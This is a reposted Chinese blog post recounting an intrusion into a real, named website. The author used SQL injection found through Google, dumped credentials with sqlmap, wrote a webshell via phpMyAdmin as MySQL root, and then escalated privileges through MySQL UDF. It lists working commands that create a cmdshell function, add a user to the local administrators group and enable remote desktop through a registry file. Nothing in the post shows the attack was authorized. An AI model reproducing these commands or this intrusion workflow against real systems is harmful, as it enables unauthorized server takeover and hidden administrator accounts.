2. 程式人生 > >udf提權的一次學習

udf提權的一次學習

阿新 發佈:2019-01-17

udf提權。利用條件:root許可權的mysql賬號密碼。提權方法:具體語句如下:
  create function cmdshell returns string soname ‘udf.dll’;
  select cmdshell(’net user iis_user 123 /add’);
  select cmdshell(’net localgroup administrators iis_user /add’);
  select cmdshell(’regedit /s d:\web\3389.reg’);
  drop function cmdshell;
  select cmdshell(’netstat -an’);
  
要測試的站點:

http://www.xiyutm.com/,至於怎麼找到的呢?google大法好。這裡寫圖片描述
隨便點進去一個url。。。都有注入點。。。這裡寫圖片描述
放到sqlmap裡面跑這裡寫圖片描述
然後很幸運的跑到了後臺的帳號和密碼,還有資料庫的帳號和密碼,放到md5上面,解密需要money,,,放到習科裡面,雷鋒的菊苣們給了明文。。。。這裡寫圖片描述
然後呢?進入後臺,找不到上傳點。絕望了,,,然後和學長get了新技能,,,上了phpmyadmin,,,用資料庫寫一句話,,,很幸運,資料庫的許可權是root。。。這裡寫圖片描述
然後連線小馬,,,開始udf提權。。。因為這個站點的條件很順,,,所以直接上傳了一個udf.php,,,連線資料庫,net user唄,,,
然後伺服器被搞定了。。。這裡寫圖片描述
看了一下,c盤只剩下幾十kb了。。。。真牛。。。

後記:昨天晚上的時候,其實已經寫完了,要比篇更加詳細一些。但是當時寫完的時候,正在和妹子聊qq,切換太快,尼瑪,,,突然火狐瀏覽器一刷,,,沒有了。。。加上這幾天天氣潮溼,感冒一直不好,,,就這樣簡單的記錄一下吧。。。

相關推薦

udf學習

udf提權。利用條件:root許可權的mysql賬號密碼。提權方法:具體語句如下:   create function cmdshell returns string soname ‘udf.dll’;   select cmdshell(’net user

21. 從一道CTF靶機來學習mysql-udf

這次測試的靶機為 Raven: 2 這裡是CTF解題視訊地址:https://www.youtube.com/watch?v=KbUUn3SDqaU 此次靶機主要學習 PHPMailer 跟 mymql 的UDF提權。 掃描網站目錄發現,還是wordpress搭建的,嘗試使用wp

MySQL的system命令在滲透測試中的使用以及UDF

style data erro 重新 pos empty linux類 directory 意思 一、MySQL中的system命令 在MySQL 5.x中增加了system命令,簡單的符號是\!,從而使MySQL可以執行系統的命令 1 mysql> system

MySQL UDF獲取主機控制權

安裝 系統 .py 執行 dex udf 操作 接口 use UDF(User defined function)是MySQL的一個拓展接口,用來擴展MySQL的功能。在具備MySQL管理員訪問權限的條件下,可利用該特性進行提權,獲取所在主機的控制權。下面以windows主

多線程系列七:記錄學習項目性能優化的過程及心得

安全問題 ota except dex 等等 exception family print 單個 一、項目背景和問題 有一個自適應的考試學習系統,對學員的學習要求經常考試進行檢查,學員的成績出來以後,老師會要求系統根據每個學員的考卷上錯誤的題目從容量為10萬左右的題庫中抽取

基礎-----mysql-udf

paths 導出 table ads local sele 代碼 更新 reat 1.總結關於udf提權方法 通過弱口令,爆破,網站配置文件等方式得到mysql數據庫帳號密碼,---還要能外連 (1).將udf.dll代碼的16進制數聲明給my_udf_a變量 set @m

學習SpringBoot RequestBodyAdvice ResponseBodyAdvice RestControllerAdvice

with except 學習 就是 ports mes selectall extend roc 今天老板給我了一套代碼,然後我就拿過去研究,代碼的風格是SSM + Shiro + nginx + SpringBoot的MVC架構風格,springboot,是當下很火的一個

udf原理詳解

define n) 指定位置 sqlmap 是什麽 reat ali 為我 location 0x00-前言 這個udf提權復現搞了三天,終於搞出來了。網上的教程對於初學者不太友好,以至於我一直迷迷糊糊的,走了不少彎路。下面就來總結一下我的理解。 想要知道udf提權是怎麽回

SQLMAP UDF

create family 數據 mysql5 連接mysql pan IT ret dir SQLMAP UDF提權 1.連接mysql數據打開一個交互shell: sqlmap.py -d mysql://root:[email protected]:3306/t

udf入侵

第三步:使用SQL語句建立功能函式。語法:Create Function 函式名(函式名只能為下面列表中的其中之一) returns string soname '匯出的DLL路徑';對於MYSQL5.0以上版本,語句中的DLL不允許帶全路徑,如果你在第二步中已將DLL匯出到系統目錄,那麼你就可以省略路徑而

學習配置叢集eureka,註冊生成者、消費端,實現簡單的服務呼叫

總結一次基於SpringCloud,Greenwich.SR2版本部署叢集eureka,註冊生產者、消費者並進行簡單呼叫的流程。

Mysql UDF方法

##0x01 UDF UDF(user defined function)使用者自定義函式,是mysql的一個拓展介面。使用者可以通過自定義函式實現在mysql中無法方便實現的功能,其新增的新函式都可以在sql語句中呼叫,就像呼叫本機函式一樣。 ##0x02 windows下udf提權的條件 - 如果mys

FileZillaServer

containe 監聽 webshell program jcache 一句話木馬 自己 公網ip地址 ott 前段時間檢測一個企業網站,在檢測該企業的一個下屬公司的網站時通過用戶名admin和密碼123456進入了後臺,後臺目錄就是公司漢語拼音+admin,諸如xxxad

枯燥的2003

  作者:leafer    所屬團隊:Arctic Shell目標機:Windows 2003 本機:win7 中介軟體:IIS Webshell:PHP一句話(已置目錄中) 相關漏洞:MS16-032   過程: 連線菜

超級詳細的流程

今天剛剛回到家 剛剛提到的伺服器 於是乎就做一做文章給大家看看(沒有什麼技術含量 只是告訴大家一個思路) 系統的cmd是不能用了 自己找可寫可執行許可權的目錄 (具體工具上傳wt.asp 或者asp大馬自帶的目錄許可權檢測工具) 這裡我已經找到了可以執行cmd的目錄 但是執行命令許可權貌似很小

STM32學習及應用筆記二:運算符優先級造成的錯誤

位與 指向 cells 偏移 getchar() 取地址 大於 沒有 事情 本人在最近一個項目的開發中,出現一個應為疏忽運算符優先級造成的問題,檢查了很久才發現問題,所以覺得運算符的優先級問題還是有必要再研究一下。具體的問題是這樣的,我采集了傳感器的原始數據,然後會

Bash腳本練習()(歡迎意見,共同學習

linux#!/bin/bash #寫一個腳本(前提:請為虛擬機新增一塊硬盤,假設它為/dev/sdb),為指定的硬盤創建分區: #1、列出當前系統上所有的磁盤,讓用戶選擇,如果選擇quit則退出腳本;如果用戶選擇錯誤,就讓用戶重新選擇; #2、當用戶選擇後,提醒用戶確認接下來的操作可能會損壞數據,並請用戶確

不專業的路由/交換機配置學習

了解 模糊 交換 現在 images alt es2017 不用 需要 一直以來對網絡的概念有點模糊,這兩天努力研究了一下,算是有點了解了. 記錄下研究過程: 先添加個服務器,給個IP和掩碼,網關等: 添加個路由,用交叉線連到服務器(都選第一個Fast口) 路由器配置

[機器學習系統設計()]數據導入,預處理與擬合

畫圖 標簽 參數 殘差 res 模型 pri itl 創建模型 目錄: 1.數據的讀取 2.數據的預處理 3.一次擬合 4.二次擬合 5.分段擬合 6.畫圖 案例:已收集某個網頁每個小時被點擊的次數,第一行數據為小時,第二行數據表示點擊次數。現在需擬合出點擊次數與時間的

【安全牛學習筆記】

security+ linux 信息安全 Windows user Administrator SystemLinux User Rootwindows提權將admin提權為systemnet user命令 查看賬戶Guest 用戶,權限很小HelpAssistant 用戶,遠程協助賬號Wi